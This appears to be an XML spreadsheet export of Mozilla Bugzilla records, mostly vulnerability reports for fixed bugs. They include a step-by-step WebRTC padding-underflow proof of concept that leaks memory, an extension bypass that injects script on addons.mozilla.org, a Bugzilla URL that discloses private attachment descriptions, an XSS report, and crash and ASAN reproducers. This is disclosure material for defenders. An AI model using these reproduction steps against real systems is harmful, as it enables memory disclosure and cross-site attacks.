      <c r="W2813" t="inlineStr">
        <is>
          <t>RTPReceiverVideo::ParseRtpPacket (media\webrtc\trunk\webrtc\modules\rtp_rtcp\source\rtp_receiver_video.cc) will underflow if an incoming packet is malformed such that its padding length is greater than its payload length. This underflow then causes ParseRtpPacket to pass to its callback function (which eventualy passes it to a video decoder) a buffer length that exceeds the buffer's actual length. The receiver's decoder then reads that buffer and displays the contents as video (which usually, but not always, appears as trash). If the receiver happens to be sharing the tab containing the decoded video with another user via Firefox Hello, the other user will receive the video, thus leaking private information to the other user.
The bug is still present in the current trunk: http://hg.mozilla.org/mozilla-central/file/96377bdbcdf3/media/webrtc/trunk/webrtc/modules/rtp_rtcp/source/rtp_receiver_video.cc ; http://hg.mozilla.org/mozilla-central/file/96377bdbcdf3/media/webrtc/trunk/webrtc/modules/rtp_rtcp/source/rtp_utility.cc .
Details
-------
The bug is in RTPReceiverVideo::ParseRtpPacket lines 72-3, which don't check for underflow:
72:   const uint16_t payload_data_length =
73:       payload_length - rtp_header-&gt;header.paddingLength;
Equivalently, the bug could be considered to be in RtpHeaderParser::Parse (media\webrtc\trunk\webrtc\modules\rtp_rtcp\source\rtp_utility.cc), which doesn't verify that the padding fits within the packet, or even in RtpDepacketizer::Parse and its overriding functions (ditto).
(BTW, there is also a similar underflow in RtpReceiverImpl::IncomingRtpPacket line 201, but it appears to be harmless because the result appears to be used only for statistics).
A (rather involved) debugger-based proof-of-concept goes like this:
1. Start FF 41.0 x86 debug build with -profilemanager -no-remote. Call this session the "sender". Create a new profile ("sender profile"), run FF with it, and attach a debugger to it.
2. Patch the sender's code in RTPSender::CreateRTPHeader (media\webrtc\trunk\webrtc\modules\rtp_rtcp\source\rtp_sender.cc) line 1103 to initialize |header [0]| to 0xa0 instead of 0x80 (this sets the P ("padding") bit in the header, which causes RtpHeaderParser::Parse to interpret the last byte of the packet as a count of padding bytes, and to assign it to |header.paddingLength|).
3. Patch the sender's code in RTPSenderVideo::Send (media\webrtc\trunk\webrtc\modules\rtp_rtcp\source\rtp_sender_video.cc) lines 358-64 to use 0x20 for the outgoing packet length instead of |payload_bytes_in_packet|. To do this, replace the sequence
   movzx edx, word ptr [ebp-620h]   ; 0f b7 95 e0 f9 ff ff
   push  edx                        ; 52
with
   push  20h                        ; 6a 20
   nop                              ; 90
   nop                              ; 90
   nop                              ; 90
   nop                              ; 90
   nop                              ; 90
   nop                              ; 90
4. Patch out the ASSERT in CreateBoxShadow (gfx\thebes\gfxBlur.cpp in 445) to avoid an unrelated spurious crash due to https://bugzilla.mozilla.org/show_bug.cgi?id=1181028 and similar bugs.
5. Let execution proceed and detach the debugger from the sender.
6. Play a long video in the sender.
7. Start FF 41.0 x86 debug build with -profilemanager -no-remote. Call this session the "receiver". Create a new profile ("receiver profile"), run FF with it, and attach a debugger to it.
8. Create an FF Hello conversation in the sender. Copy the link and open it in the receiver.
9. When the conversation is connected, share the sender's tabs.
10. Watch the video trash in the receiver's tab until the receiver crashes with a read access violation.
11. Trace back the stack into ViEReceiver::OnReceivedPayloadData and note that |payload_size| is about 0xffxx. Note also that one or more pages in the range [|payload_data|, |payload_data+payload_size-1] are inaccessible, and that the crash read-access violation address is in this range.
12. Trace back the stack into RtpReceiverVideo::ParseRtpPacket and examine |payload_data_length| on line 72. Notice that it's about 0xffxx. Examine |payload_length| and notice it's 0x20, and examine |rtp_header-&gt;header.paddingLength| and notice it's &gt; 0x20.
13. You can show that the receiver leaks information to another user by restarting the receiver and re-establishing the Hello session. Then start a third FF session with -profilemanager -no-remote, start another Hello session between the receiver and the third session, and share the receiver's tab with the third session. Notice how the trash displayed in the receiver's tab is also displayed in the third session's window.
Typically the receiver displays garbage for a few seconds to a few minutes, then crashes with a read access violation, sometimes in ViEReceiver::OnReceivedPayloadData where it calls vcm_-&gt;IncomingPacket, sometimes near the end of VCMJitterBuffer::GetFrame, sometimes elsewhere.</t>
        </is>
      </c>
      <c r="X2813" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2814">
      <c r="A2814" t="n">
        <v>1537700</v>
      </c>
      <c r="B2814" t="inlineStr">
        <is>
          <t>2019-03-21 02:14:39 -0700</t>
        </is>
      </c>
      <c r="C2814" t="inlineStr">
        <is>
          <t>Create the "arc" command and call arc from within moz-phab</t>
        </is>
      </c>
      <c r="D2814" t="inlineStr">
        <is>
          <t>2019-04-17 09:53:29 -0700</t>
        </is>
      </c>
      <c r="E2814" t="n">
        <v>1</v>
      </c>
      <c r="F2814" t="n">
        <v>1</v>
      </c>
      <c r="G2814" t="n">
        <v>7</v>
      </c>
      <c r="H2814" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2814" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J2814" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K2814" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2814" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2814" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2814" t="inlineStr"/>
      <c r="Q2814" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2814" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2814" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2814" t="n">
        <v>1</v>
      </c>
      <c r="U2814" t="n">
        <v>0</v>
      </c>
      <c r="V2814" t="n">
        <v>3</v>
      </c>
      <c r="W2814" t="inlineStr">
        <is>
          <t>For advanced usage of arcanist we can have an `arc` command.
`moz-phab arc land --preview`
would call `arc` and pass the `land --preview` arguments.</t>
        </is>
      </c>
      <c r="X2814" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2815">
      <c r="A2815" t="n">
        <v>1427289</v>
      </c>
      <c r="B2815" t="inlineStr">
        <is>
          <t>2017-12-28 09:46:46 -0800</t>
        </is>
      </c>
      <c r="C2815" t="inlineStr">
        <is>
          <t>Executing JS on addons.mozilla.org using webRequestBlocking</t>
        </is>
      </c>
      <c r="D2815" t="inlineStr">
        <is>
          <t>2024-05-30 09:41:27 -0700</t>
        </is>
      </c>
      <c r="E2815" t="n">
        <v>1</v>
      </c>
      <c r="F2815" t="n">
        <v>1</v>
      </c>
      <c r="G2815" t="n">
        <v>3</v>
      </c>
      <c r="H2815" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2815" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J2815" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K2815" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L2815" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2815" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2815" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2815" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2815" t="inlineStr">
        <is>
          <t>[adv-main60+]</t>
        </is>
      </c>
      <c r="Q2815" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2815" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2815" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T2815" t="n">
        <v>1</v>
      </c>
      <c r="U2815" t="n">
        <v>0</v>
      </c>
      <c r="V2815" t="n">
        <v>13</v>
      </c>
      <c r="W2815" t="inlineStr">
        <is>
          <t>Created attachment 8939027
POC.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36
Steps to reproduce:
1. Install attached PoC
Actual results:
https://addons.mozilla.org is opened and then using browser.webRequest.filterResponseData we filter the script loading of google-analytics injecting it with our own code.
Expected results:
Usually when you mention "&lt;all_urls&gt;" within the manifest permission you still can't execute JS on the addons website, but for some reason webRequest doesn't perform this check.</t>
        </is>
      </c>
      <c r="X2815" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2816">
      <c r="A2816" t="n">
        <v>1255923</v>
      </c>
      <c r="B2816" t="inlineStr">
        <is>
          <t>2016-03-11 15:46:45 -0800</t>
        </is>
      </c>
      <c r="C2816" t="inlineStr">
        <is>
          <t>ICE failure log sanitzation code has rotted</t>
        </is>
      </c>
      <c r="D2816" t="inlineStr">
        <is>
          <t>2018-11-05 15:36:08 -0800</t>
        </is>
      </c>
      <c r="E2816" t="n">
        <v>1</v>
      </c>
      <c r="F2816" t="n">
        <v>1</v>
      </c>
      <c r="G2816" t="n">
        <v>6</v>
      </c>
      <c r="H2816" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2816" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J2816" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K2816" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2816" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2816" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2816" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2816" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2816" t="inlineStr">
        <is>
          <t>[btpp-fix-now]</t>
        </is>
      </c>
      <c r="Q2816" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2816" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2816" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2816" t="n">
        <v>1</v>
      </c>
      <c r="U2816" t="n">
        <v>0</v>
      </c>
      <c r="V2816" t="n">
        <v>6</v>
      </c>
      <c r="W2816" t="inlineStr">
        <is>
          <t>The "sanitizeUrls" function in MozLoopWorker has stopped doing its job.
Looking at the current code:
https://github.com/mozilla/loop/blob/master/add-on/chrome/modules/MozLoopWorker.js#L134
The pattern being matched for removal is /(#call|#incoming).*/
But our current format is url=about:loopconversation#{token}. And looking at the logs that we're currently recording, these tokens are being written into the failure logs rather than being replaced with "xxx"
Flagging SS for privacy implications. Marking critical for privacy implications.</t>
        </is>
      </c>
      <c r="X2816" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2817">
      <c r="A2817" t="n">
        <v>802204</v>
      </c>
      <c r="B2817" t="inlineStr">
        <is>
          <t>2012-10-16 09:33:08 -0700</t>
        </is>
      </c>
      <c r="C2817" t="inlineStr">
        <is>
          <t>[SECURITY] Marking an attachment you cannot see as obsolete can disclose its description</t>
        </is>
      </c>
      <c r="D2817" t="inlineStr">
        <is>
          <t>2012-11-14 04:30:13 -0800</t>
        </is>
      </c>
      <c r="E2817" t="n">
        <v>1</v>
      </c>
      <c r="F2817" t="n">
        <v>1</v>
      </c>
      <c r="G2817" t="n">
        <v>4</v>
      </c>
      <c r="H2817" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2817" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2817" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K2817" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L2817" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2817" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2817" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2817" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2817" t="inlineStr"/>
      <c r="Q2817" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2817" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2817" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T2817" t="n">
        <v>1</v>
      </c>
      <c r="U2817" t="n">
        <v>0</v>
      </c>
      <c r="V2817" t="n">
        <v>7</v>
      </c>
      <c r="W2817" t="inlineStr">
        <is>
          <t>If an attachment is in a bug you cannot see but for some reason you know its ID (e.g. because bugbot reports the attachment ID on IRC when someone requests/grants/denies review), it's trivial to get its description despite you cannot access the attachment nor the bug:
Imagine you can access the public bug 3 and the attachment 1 is in the private bug 4. All you have to do is to type this URL in your web browser (with a valid token, but you can extract it from the HTML form):
 attachment.cgi?action=insert&amp;bugid=3&amp;obsolete=1&amp;token=XXXXXXX
Bugzilla will detect the mismatch and throws:
"Attachment 1 (patch to fix the vulnerability in Foo.cpp when doing action X) is attached to bug 4, but you tried to flag it as obsolete while creating a new attachment to bug 3."
The error message disclosed the description of the attachment, despite you cannot access it!
This vulnerability exists since Bugzilla 2.16, see bug 98602!</t>
        </is>
      </c>
      <c r="X2817" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2818">
      <c r="A2818" t="n">
        <v>527989</v>
      </c>
      <c r="B2818" t="inlineStr">
        <is>
          <t>2009-11-11 11:56:02 -0800</t>
        </is>
      </c>
      <c r="C2818" t="inlineStr">
        <is>
          <t>Add repack-on-change builders for Maemo L10n and Fennec Desktop L10n</t>
        </is>
      </c>
      <c r="D2818" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2818" t="n">
        <v>1</v>
      </c>
      <c r="F2818" t="n">
        <v>1</v>
      </c>
      <c r="G2818" t="n">
        <v>5</v>
      </c>
      <c r="H2818" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2818" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2818" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2818" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2818" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2818" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2818" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2818" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2818" t="inlineStr">
        <is>
          <t>[fennec l10n][l10n]</t>
        </is>
      </c>
      <c r="Q2818" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2818" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2818" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2818" t="n">
        <v>1</v>
      </c>
      <c r="U2818" t="n">
        <v>0</v>
      </c>
      <c r="V2818" t="n">
        <v>24</v>
      </c>
      <c r="W2818" t="inlineStr">
        <is>
          <t>We currently don't have l10n builders that handle repacks-on-change for Fennec.
On the Firefox scenario we have two builders because we didn't want the repacks-on-change to be uploaded just to tinderbox-builds and not latest. Both builders had slightly different steps (e.g. no updates http://hg.mozilla.org/build/buildbotcustom/file/tip/process/factory.py#l1658).
For the Fennec scenario I can't see at first glance where things get uploaded for each scenario (to be taken care by who takes this) and what the differences on steps are.
# What to consider to get this done
* add the builder to TinderboxMailNotifier
* the scheduler is already taken care by s = SchedulerL10n("l10n", "l10nbuilds2.ini")
* add the factory for the repack-on-change (in NightlyRepackFactory we make it dependent through nightly=False; not sure about MobileDesktopBuildFactory and MaemoNightlyRepackFactory)
* add the builder
The files to work on are (if I am not mistaken):
* mobile_master.py (instead of misc.py like on Firefox)
* l10nbuilds2.ini
To add the new repack-on-change builders to tinderbox like this:
http://mxr.mozilla.org/build/source/buildbotcustom/misc.py#247
to be fixed in here:
http://mxr.mozilla.org/build/source/buildbot-configs/mozilla2-staging/mobile_master.py#84
NOTE: The naming on the Firefox is incorrect since it doesn't have the word "nightly" for the real nightly. We can fix this for the Fennec scenario in here (I think) http://mxr.mozilla.org/build/source/buildbot-configs/mozilla2-staging/mobile_master.py#69 
Add the repack-on-change factory after this one:
http://mxr.mozilla.org/build/source/buildbot-configs/mozilla2-staging/mobile_master.py#433
Specify which builders handle the repackages-on-change:
http://mxr.mozilla.org/build/source/buildbot-configs/mozilla2/l10nbuilds2.ini#23
http://mxr.mozilla.org/build/source/buildbot-configs/mozilla2/l10nbuilds2.ini#35</t>
        </is>
      </c>
      <c r="X2818" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2819">
      <c r="A2819" t="n">
        <v>460002</v>
      </c>
      <c r="B2819" t="inlineStr">
        <is>
          <t>2008-10-15 02:18:18 -0700</t>
        </is>
      </c>
      <c r="C2819" t="inlineStr">
        <is>
          <t>It's possible to circumvent the inner window check in nsXMLHttpRequest::NotifyEventListeners()</t>
        </is>
      </c>
      <c r="D2819" t="inlineStr">
        <is>
          <t>2009-01-05 13:08:03 -0800</t>
        </is>
      </c>
      <c r="E2819" t="n">
        <v>1</v>
      </c>
      <c r="F2819" t="n">
        <v>1</v>
      </c>
      <c r="G2819" t="n">
        <v>3</v>
      </c>
      <c r="H2819" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2819" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2819" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2819" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2819" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2819" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2819" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2819" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2819" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q2819" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2819" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2819" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2819" t="n">
        <v>1</v>
      </c>
      <c r="U2819" t="n">
        <v>0</v>
      </c>
      <c r="V2819" t="n">
        <v>15</v>
      </c>
      <c r="W2819" t="inlineStr">
        <is>
          <t>This bug is for fx3.0.x and fx2.0.0.x.
In nsXMLHttpRequest::NotifyEventListeners(), CheckInnerWindowCorrectness() is
called only once, and then multiple listeners are called.  Thus, it's possible
to circumvent the inner window check by using two listeners.
(Trunk is also exploitable in the same way, but depends on bug 460001.)</t>
        </is>
      </c>
      <c r="X2819" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2820">
      <c r="A2820" t="n">
        <v>31314</v>
      </c>
      <c r="B2820" t="inlineStr">
        <is>
          <t>2000-03-10 04:24:48 -0800</t>
        </is>
      </c>
      <c r="C2820" t="inlineStr">
        <is>
          <t>Support for "In-Reply-To" header in emails</t>
        </is>
      </c>
      <c r="D2820" t="inlineStr">
        <is>
          <t>2014-04-26 03:30:01 -0700</t>
        </is>
      </c>
      <c r="E2820" t="n">
        <v>1</v>
      </c>
      <c r="F2820" t="n">
        <v>1</v>
      </c>
      <c r="G2820" t="n">
        <v>4</v>
      </c>
      <c r="H2820" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2820" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2820" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K2820" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2820" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2820" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2820" t="inlineStr"/>
      <c r="Q2820" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R2820" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2820" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T2820" t="n">
        <v>1</v>
      </c>
      <c r="U2820" t="n">
        <v>4</v>
      </c>
      <c r="V2820" t="n">
        <v>71</v>
      </c>
      <c r="W2820" t="inlineStr">
        <is>
          <t>I use mutt as my email client and it has this cool feature where it can
automatically arrange related emails into "thread-o-logically correct" order. To
do this it requires the "In-Reply_to" header to be correctly set, which bugzilla
doesn't do. The format of the header is:
In-Reply-To: &lt;presvious-message-id&gt;; From email@blah.com on &lt;date&gt;
What would be good if it would set the In-Reply-To header to point to the
previous comment for that bug so that they will be displayed as a thread.</t>
        </is>
      </c>
      <c r="X2820" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2821">
      <c r="A2821" t="n">
        <v>855236</v>
      </c>
      <c r="B2821" t="inlineStr">
        <is>
          <t>2013-03-27 03:00:19 -0700</t>
        </is>
      </c>
      <c r="C2821" t="inlineStr">
        <is>
          <t>Crash with SIGTRAP</t>
        </is>
      </c>
      <c r="D2821" t="inlineStr">
        <is>
          <t>2013-11-25 16:40:45 -0800</t>
        </is>
      </c>
      <c r="E2821" t="n">
        <v>1</v>
      </c>
      <c r="F2821" t="n">
        <v>1</v>
      </c>
      <c r="G2821" t="n">
        <v>3</v>
      </c>
      <c r="H2821" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2821" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2821" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2821" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2821" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2821" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2821" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2821" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2821" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main21+]</t>
        </is>
      </c>
      <c r="Q2821" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2821" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2821" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T2821" t="n">
        <v>1</v>
      </c>
      <c r="U2821" t="n">
        <v>0</v>
      </c>
      <c r="V2821" t="n">
        <v>28</v>
      </c>
      <c r="W2821" t="inlineStr">
        <is>
          <t>mjitChunkLimit(11);
options('strict');
function h(...d) {};
eval("\
    toSource = function () {\
        x = 0;\
        return function() {\
            ++x;\
            if (x % 4) {\
                this[0] = 1;\
                this.h();\
            }\
        };\
    }();\
");
Object.preventExtensions(this);
g = function() {}
eval("function f(){}");
crashes js debug shell on m-c changeset 178a4a770bb1 with --no-ion -a at SIGTRAP.
During the course of reduction I had to alter the mjitChunkLimit value as needed to keep crashing with smaller testcases.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x009b3e80 in ?? ()
gdb $ bt
#0  0x009b3e80 in ?? ()
#1  0x00b3cd40 in ?? ()
Previous frame inner to this frame (gdb could not unwind past this frame)
gdb $</t>
        </is>
      </c>
      <c r="X2821" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2822">
      <c r="A2822" t="n">
        <v>619588</v>
      </c>
      <c r="B2822" t="inlineStr">
        <is>
          <t>2010-12-15 18:05:32 -0800</t>
        </is>
      </c>
      <c r="C2822" t="inlineStr">
        <is>
          <t>[SECURITY] Safety checks that disallow clicking for javascript: or data: URLs in the URL field can be evaded with prefixed whitespace</t>
        </is>
      </c>
      <c r="D2822" t="inlineStr">
        <is>
          <t>2013-01-28 10:06:56 -0800</t>
        </is>
      </c>
      <c r="E2822" t="n">
        <v>1</v>
      </c>
      <c r="F2822" t="n">
        <v>1</v>
      </c>
      <c r="G2822" t="n">
        <v>4</v>
      </c>
      <c r="H2822" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2822" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2822" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2822" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L2822" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2822" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2822" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2822" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2822" t="inlineStr">
        <is>
          <t>[infrasec:input][ws:moderate]</t>
        </is>
      </c>
      <c r="Q2822" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2822" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2822" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T2822" t="n">
        <v>1</v>
      </c>
      <c r="U2822" t="n">
        <v>0</v>
      </c>
      <c r="V2822" t="n">
        <v>37</v>
      </c>
      <c r="W2822" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Build Identifier: 
Inspired by bug 619566, I felt compelled to file a bug with a more believable testcase for an XSS flaw (as in, anyone who reads the bug URL realizes it's an XSS attempt).
Reproducible: Always
Steps to Reproduce:
1. Click the bug URL provided
Actual Results:  
It alerts my document cookies
Expected Results:  
Input such as that should be filtered before actually going into the database.</t>
        </is>
      </c>
      <c r="X2822" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2823">
      <c r="A2823" t="n">
        <v>1553820</v>
      </c>
      <c r="B2823" t="inlineStr">
        <is>
          <t>2019-05-23 06:39:54 -0700</t>
        </is>
      </c>
      <c r="C2823" t="inlineStr">
        <is>
          <t>Heap buffer overflow in icalparser.c parser_get_next_char</t>
        </is>
      </c>
      <c r="D2823" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:42 -0700</t>
        </is>
      </c>
      <c r="E2823" t="n">
        <v>1</v>
      </c>
      <c r="F2823" t="n">
        <v>1</v>
      </c>
      <c r="G2823" t="n">
        <v>2</v>
      </c>
      <c r="H2823" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2823" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J2823" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2823" t="inlineStr">
        <is>
          <t>Lightning 6.2</t>
        </is>
      </c>
      <c r="L2823" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2823" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2823" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2823" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2823" t="inlineStr"/>
      <c r="Q2823" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2823" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2823" t="inlineStr">
        <is>
          <t>6.2.7</t>
        </is>
      </c>
      <c r="T2823" t="n">
        <v>1</v>
      </c>
      <c r="U2823" t="n">
        <v>0</v>
      </c>
      <c r="V2823" t="n">
        <v>48</v>
      </c>
      <c r="W2823" t="inlineStr">
        <is>
          <t>Created attachment 9067032
heap-read
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Steps to reproduce:
While fuzzing icalparser_parse_string from Thunderbird's fork of libical built with ASAN, a heap buffer overflow read triggers in parser_get_next_char with some inputs. A reliable reproducer is attached.
Actual results:
==2528==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000040f at pc 0x00000052c655 bp 0x7ffef533cc30 sp 0x7ffef533cc28
READ of size 1 at 0x60700000040f thread T0
    #0 0x52c654 in parser_get_next_char /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:208:38
    #1 0x5183bc in parser_get_prop_name /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:247:9
    #2 0x5183bc in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:700
    #3 0x517e1b in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:623:11
    #4 0x4fd243 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
